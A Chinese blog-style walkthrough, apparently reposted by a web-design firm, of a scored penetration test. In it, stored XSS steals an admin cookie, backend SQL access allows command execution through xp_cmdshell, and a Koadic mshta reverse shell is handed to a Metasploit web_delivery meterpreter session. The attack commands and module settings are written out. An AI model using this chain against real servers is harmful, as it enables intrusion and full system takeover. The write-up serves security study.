本文小編為大家詳細(xì)介紹“服務(wù)器權(quán)限滲透測(cè)試實(shí)例分析”，內(nèi)容詳細(xì)，步驟清晰，細(xì)節(jié)處理妥當(dāng)，希望這篇“服務(wù)器權(quán)限滲透測(cè)試實(shí)例分析”文章能幫助大家解決疑惑，下面跟著小編的思路慢慢深入，一起來學(xué)習(xí)新知識(shí)吧。

成都創(chuàng)新互聯(lián)公司長(zhǎng)期為上1000+客戶提供的網(wǎng)站建設(shè)服務(wù)，團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年，關(guān)注不同地域、不同群體，并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù)；打造開放共贏平臺(tái)，與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為龍巖企業(yè)提供專業(yè)的網(wǎng)站設(shè)計(jì)制作、成都做網(wǎng)站，龍巖網(wǎng)站改版等技術(shù)服務(wù)。擁有十載豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

XSS

說起XSS，很多測(cè)試人員往往只輸入一些簡(jiǎn)單的payload讓其彈窗證明即可（之前我也是這么干的）但通過這篇文章，可能以后不會(huì)再讓我們僅僅彈個(gè)窗證明其XSS漏洞存在；

Google語法

尋找入手點(diǎn)
滲透的思路是首先進(jìn)行信息搜集，但這次測(cè)試的只有g(shù)etshell或者拿到服務(wù)器的權(quán)限才給分?jǐn)?shù)，像一般的XSS，csrf、弱口令是不算的即便是拿到后臺(tái)但是沒有g(shù)etshell的話也是不算的。

在這種情況下一般我是尋找上傳點(diǎn)，通過Google語法搜索，site:子域名+intitle:注冊(cè)/登錄/系統(tǒng)來尋找可以注冊(cè)或者登錄的地方。

注冊(cè)成功后發(fā)現(xiàn)個(gè)人信息處存在XSS漏洞，平常測(cè)試都是讓其彈窗證明一下即可，沒有想通過XSS來做一些事情。

因?yàn)樵撎幱猩矸葑C上傳功能，我首先對(duì)上傳點(diǎn)進(jìn)行繞過，但是試了各種方法后發(fā)現(xiàn)沒有成功，故放棄該上傳點(diǎn)，開始仔細(xì)審查這個(gè)網(wǎng)站，發(fā)現(xiàn)此處提交個(gè)人信息保存后要管理員審核，而又存在存儲(chǔ)型XSS，那為什么不碰碰運(yùn)氣打一下管理員的cookie呢。

于是在此處插入XSSpayload之后就出去吃飯靜等結(jié)果。

沒想到今天臉確實(shí)挺白的，吃飯時(shí)發(fā)現(xiàn)XSS打到管理員cookie信息的郵箱已經(jīng)彈到了我的手機(jī)上，顧不上吃飯立馬回去打開電腦繼續(xù)搞。

XSS盲打后臺(tái)

訪問之后通過chrome上的EditThisCookie插件替換cookie成功以管理員的身份進(jìn)入后臺(tái)，但發(fā)現(xiàn)進(jìn)入的頁面是一個(gè)類似于靜態(tài)的頁面，只能看到里面的一些信息，其他什么功能都沒有：

心想，不應(yīng)該啊，既然管理員要審核我的用戶信息，肯定是要有審核的那個(gè)接口，這時(shí)就想到了瀏覽器的同源策略

瀏覽器的同源策略

同源的定義：如果兩個(gè)頁面的協(xié)議，端口和主機(jī)都相同，則兩個(gè)頁面具有相同的源。

Cookie：只有同源的網(wǎng)頁才能共享，但是若兩個(gè)頁面一級(jí)域名相同，只是二級(jí)域名不同，那么瀏覽器可以通過設(shè)置document.domain來共享Cookie。

同源策略

果然可行，通過同源策略，我們成功的進(jìn)入了管理員的后臺(tái)。

進(jìn)入后臺(tái)第一件事：找上傳點(diǎn)！同樣無果，只能看看有沒有其他的突破口。終于在內(nèi)容管理處找到了一個(gè)可以執(zhí)行sql語句的地方。

既然可以執(zhí)行SQL語句，那肯定少不了我們的常用命令xp_cmdshell，通過命令exec master..xp_cmdshell 'powershell whoami'命令成功執(zhí)行，得知該服務(wù)器權(quán)限為system權(quán)限。

接下來的任務(wù)就是反彈shell到我們的MSF上了。但發(fā)現(xiàn)powershell反彈shell怎么彈都彈不回來，但走到這一步總不能放棄吧，畢竟我是想進(jìn)入他們內(nèi)網(wǎng)拉屎的男人。

這時(shí)問了公司大佬，大佬說可以用koadic試一試。

koadic的使用

   之前發(fā)現(xiàn)社區(qū)里面并沒有對(duì)koadic的介紹，我這里簡(jiǎn)單的提兩句吧。
Koadic是發(fā)布于DEFCON上的一個(gè)后滲透工具，它和msf相似，但是Koadic主要是通過使用Windows ScriptHost（也稱為JScript / VBScript）進(jìn)行大部分的操作，其核心兼容性支持Windows2000到Window 10的環(huán)境中使用，Koadic也試圖兼容Python 2和Python 3。

設(shè)置IP和端口，進(jìn)行本地監(jiān)聽。

koadic生成的mshta http://ip/XXXX 通過xp_cmdshell成功執(zhí)行命令反彈到koadic上。

監(jiān)聽成功：

cmdshell 0 -->進(jìn)入cmd命令模式

這里其實(shí)使用koadic也可以進(jìn)行后續(xù)操作，如提權(quán)、抓密碼等，但確實(shí)是不太熟悉koadic的一些功能，所以這里我們還是選擇使用我們最熟悉的MSF這款神器吧。（吹爆MSF！！-。-）

koadic轉(zhuǎn)shell到MSF

既然在koadic可以執(zhí)行CMD命令，接下來我們只需要把shell轉(zhuǎn)到msf上即可；

打開MSF :msfconsole
使用web_delivery模塊
use exploit/multi/script/web_delivery
設(shè)置payload：
set payload windows/x64/meterpreter/reverse_tcp_rc4
set SRVPORT 8081
set lhost XX.XX.XX.XXX

因?yàn)橹耙呀?jīng)通過koadic監(jiān)聽到，而koadic和MSF都搭在我的服務(wù)器上，我們可以將其設(shè)置為攻擊者的內(nèi)網(wǎng)IP地址。

查看內(nèi)網(wǎng)ip：

set reverselistenerbindaddress 172.xx.xx.182

run
生成一個(gè)powershell.exe

在koadic執(zhí)行exe之后成功將shell轉(zhuǎn)移到我們的MSF上

成功接收到sessions

看到熟悉的meterpreter模塊真的是老淚縱橫啊?。。?/p>

因?yàn)樵摲?wù)器的權(quán)限直接是system權(quán)限，無需提權(quán)，正當(dāng)我想繼續(xù)內(nèi)網(wǎng)的主機(jī)各種橫向各種沖沖沖的的時(shí)候發(fā)現(xiàn)了一個(gè)重要的問題：沒有域?。?！

讀到這里，這篇“服務(wù)器權(quán)限滲透測(cè)試實(shí)例分析”文章已經(jīng)介紹完畢，想要掌握這篇文章的知識(shí)點(diǎn)還需要大家自己動(dòng)手實(shí)踐使用過才能領(lǐng)會(huì)，如果想了解更多相關(guān)內(nèi)容的文章，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

文章題目：服務(wù)器權(quán)限滲透測(cè)試實(shí)例分析
分享網(wǎng)址：http://chinadenli.net/article0/jiosoo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站排名、網(wǎng)頁設(shè)計(jì)公司、網(wǎng)站營銷、網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、搜索引擎優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)